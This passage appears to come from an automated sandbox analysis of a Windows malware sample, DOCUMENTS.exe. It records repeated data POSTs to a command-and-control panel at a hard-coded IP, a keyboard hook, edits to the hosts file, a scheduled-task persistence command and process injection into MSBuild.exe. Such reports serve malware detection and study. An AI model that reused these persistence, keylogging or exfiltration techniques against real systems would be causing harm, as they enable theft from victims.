                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 668Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 3516Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 456Expect: 100-continue
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49676
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.203.69.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.203.69.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.55.161.167
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.55.161.167
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 161.129.64.49
                      Source: MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: MSBuild.exe, 00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmpString found in binary or memory: http://161.129.64.49
                      Source: MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php
                      Source: MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php127.0.0.1POST
                      Source: MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: http://161.129.64.49x&
                      Source: MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: MSBuild.exe, 00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmp, MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: http://cUpnXtBcsknsdD.com
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: DOCUMENTS.exe, 00000000.00000003.260935512.0000000005AE9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: DOCUMENTS.exe, 00000000.00000002.292439834.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                      Source: DOCUMENTS.exe, 00000000.00000002.292439834.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasc
                      Source: DOCUMENTS.exe, 00000000.00000002.292439834.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.come.com$u
                      Source: DOCUMENTS.exe, 00000000.00000003.252497884.0000000005AFB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: DOCUMENTS.exe, 00000000.00000003.252461730.0000000005AFB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
                      Source: DOCUMENTS.exe, 00000000.00000003.252497884.0000000005AFB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comx
                      Source: DOCUMENTS.exe, 00000000.00000003.254970840.0000000005AE4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.c
                      Source: DOCUMENTS.exe, 00000000.00000003.254970840.0000000005AE4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: DOCUMENTS.exe, 00000000.00000003.255313836.0000000005AE4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: DOCUMENTS.exe, 00000000.00000003.254947083.0000000005B1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn6
                      Source: DOCUMENTS.exe, 00000000.00000003.254947083.0000000005B1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn8g
                      Source: DOCUMENTS.exe, 00000000.00000003.254947083.0000000005B1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnhgN
                      Source: DOCUMENTS.exe, 00000000.00000003.254970840.0000000005AE4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnle:gKg
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: DOCUMENTS.exe, 00000000.00000002.292439834.0000000005AE0000.00000004.00000001.sdmp, DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: DOCUMENTS.exe, 00000000.00000003.257338663.0000000005AE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Yu
                      Source: DOCUMENTS.exe, 00000000.00000003.257338663.0000000005AE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: DOCUMENTS.exe, 00000000.00000003.257338663.0000000005AE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/osof
                      Source: DOCUMENTS.exe, 00000000.00000003.257338663.0000000005AE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/seb
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: DOCUMENTS.exe, 00000000.00000003.252219497.0000000005AFB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
                      Source: DOCUMENTS.exe, 00000000.00000003.252219497.0000000005AFB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comibi_
                      Source: DOCUMENTS.exe, 00000000.00000003.252219497.0000000005AFB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coms
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: DOCUMENTS.exe, 00000000.00000003.254341564.0000000005AE6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: DOCUMENTS.exe, 00000000.00000003.254341564.0000000005AE6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krFeSi
                      Source: DOCUMENTS.exe, 00000000.00000003.254341564.0000000005AE6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krt
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: DOCUMENTS.exe, 00000000.00000003.253296632.0000000005AFB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comn
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: DOCUMENTS.exe, 00000000.00000002.292662207.0000000006CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: http://xJKvnt.com
                      Source: MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%(
                      Source: MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: DOCUMENTS.exe, 00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmp, MSBuild.exe, 00000009.00000002.520256174.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: MSBuild.exe, 00000009.00000002.524239294.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 161.129.64.49Content-Length: 458Expect: 100-continueConnection: Keep-Alive

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: DOCUMENTS.exe
                      .NET source code contains very large stringsShow sources
                      Source: DOCUMENTS.exe, Form1.csLong String: Length: 38272
                      Source: ncXzBAPDBtn.exe.0.dr, Form1.csLong String: Length: 38272
                      Source: 0.0.DOCUMENTS.exe.e30000.0.unpack, Form1.csLong String: Length: 38272
                      Source: 0.2.DOCUMENTS.exe.e30000.0.unpack, Form1.csLong String: Length: 38272
                      Source: DOCUMENTS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EBBD0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E5FC9
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E49C0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E69C0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E5948
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EED60
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E7880
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E40B8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E64C1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EE8F8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E4608
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EE43C
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EFC31
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EC078
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E8580
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EC380
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E49B0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EB3B1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EE5D6
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E4DC0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EBBC0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EADFF
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E45F9
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EB3F0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E4318
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E9710
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E4309
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E9701
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E8F50
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E9950
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EED51
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E8F40
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E8570
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EC36F
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E9960
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E5890
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019ECAB2
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019ECAC0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E94F8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E94E8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EE8E8
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E9AE9
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019E7832
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019ED02E
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019ED048
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EAE68
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EC069
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_0B9F0006
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_0B9F0070
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_011FC301
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_011F1F58
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_011F0070
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_011F4088
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_011F5C80
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_011F0024
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_02EDF6FF
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_02EDAE68
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_02EDD620
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_02EDDFB1
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_02EDAE08
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_05AB0EE8
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_05AB76F8
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_05AB0070
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_05AB1D90
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_05AB6FF0
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_058A0D72 NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_058A0D41 NtQuerySystemInformation,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_0122B0BA NtQuerySystemInformation,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_0122B089 NtQuerySystemInformation,
                      Source: DOCUMENTS.exeBinary or memory string: OriginalFilename vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000000.00000002.292198643.00000000058C0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000000.00000002.291041786.00000000046C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000000.00000000.250385953.0000000000E32000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUnmanagedMemoryStre.exeh$ vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000000.00000002.293912263.000000000A721000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameqJSTtDTISaCwBJDgVlmtSrlkDMdjFqgoqmoUWx.exe4 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exeBinary or memory string: OriginalFilenameUnmanagedMemoryStre.exeh$ vs DOCUMENTS.exe
                      Source: DOCUMENTS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: DOCUMENTS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: DOCUMENTS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ncXzBAPDBtn.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ncXzBAPDBtn.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ncXzBAPDBtn.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: DOCUMENTS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: ncXzBAPDBtn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: DOCUMENTS.exeReversingLabs: Detection: 17%
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile read: C:\Users\user\Desktop\DOCUMENTS.exeJump to behavior
                      Source: DOCUMENTS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\DOCUMENTS.exe 'C:\Users\user\Desktop\DOCUMENTS.exe'
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp'
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
